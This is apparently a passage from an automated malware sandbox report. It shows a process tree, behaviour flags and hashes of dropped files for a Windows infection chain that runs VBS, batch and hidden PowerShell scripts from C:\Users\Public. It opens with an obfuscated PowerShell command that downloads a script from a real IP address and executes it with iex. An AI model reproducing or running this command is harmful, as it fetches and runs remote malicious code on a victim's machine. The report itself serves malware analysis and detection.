QPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yoaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yaaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ydaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ySaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ytaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yraUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yiaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥ynaUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥yg(''http://185.81.157.103/96/1.txt'')').Replace('aUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥hUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥bUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥pUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥jUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥eUTSRQPONï¼ï¼¬ï¼«ï¼ªï¼©ï¼¨ï¼ºï¼¹ï¼¸ï¼·ï¼¶ï¼§ï¼¦ï¼¥y','')|iex2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2744
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {B1F5D91D-0ECF-4114-BA10-3A0FC54202E9} S-1-5-21-928733405-3780110381-2966456290-1000:VTILVGXH\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:1040 -
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Public\hich.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:2872 -
C:\Windows\System32\cmd.execmd /c ""C:\Users\Public\hich.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:2540
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\hich.ps1'"1⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1316
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD525af3af8f786943d78326df1a84fd5df
SHA1331aa1b11635d06c4ab3e292139e134c3f907113
SHA2566058dfc7bbbaac27a77299952669de5145c7a3277dcf3e46f8af4e4eac87f29a
SHA512d32a51522562117700a735e1af0ae279528a3e668ee753cb1b45dfe9422a3bc184a9ba4c94c12dc78c73b8324d3b392f5e1e478cfec066333e4170f342f06f90
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J8RF7N5OGWR5H3BR9IKQ.temp
Filesize7KB
MD5ce37b88de003d46be6fb52b722efd721
SHA19817eb666450d67d8d1a96ba8d99b760132bc856
SHA256a9f696a8992cbb6984933405c456d49c2e97adc9e98a2f8ee6e88f6a7f5a5fd1
SHA512f93ee23a0ab7b0574fba19eced9e7d835627c09d0ee0bfab7f4239c2f4b53ad374de3498c282776082b551c30e09b82c56aaca574eea8c23e44b33d86aa56ada
-
Filesize
195B
MD56c8a34a94e068b809145df09acbe153c
SHA10ec5c6964c6ccc949af47297eb9794f8f1ee4724
SHA256c683e03275b7f8d2031a42bdde2b95e2f46e8811004205a092e87de4bae5d003
SHA51241431bb242a1b5848b8c4ab197dc6181db6f203bb26de68f492b99e876b63b73c6497fb996b0341045b1babd1c92be3346de116fa3699017d58e1d1199bfd805
-
Filesize
556KB
MD5b13a273e32d5763a07d712e5209055fa
SHA1633dd0e5f647fee13536f74247159cdb07d72273
SHA2562c9c01e49757fa9a9732a3e9a1f06fb785afe6f288382458d4e6bbf0adee3486
SHA5128b50f49dfd641467b7c11363d221c790e99b41aa4fdd97befb8c7deb1516584774690ab2b9ee4be951d162d9a56d57586af1d49d39a6f6f97a8a3b1fbc432908
-
Filesize
686B
MD5741b5b0a474f0e0cd28fd880f68723c0
SHA14de5489c4e56882514b3ab432048200eae65f90d
SHA256f7edde68b4f783fe07a6cb0d12ffc76b04a9d81747cff32eed06c7caee5f7b23
SHA5123783759fc24189ddb02ab9bd9888f4fe458ed378c6079d3fbd28af6fc34200d5f45ccd7e1c4beca90d9afe9d3bb29f7f20128c7b0a958c2c8a1a1ce8e9cc2f54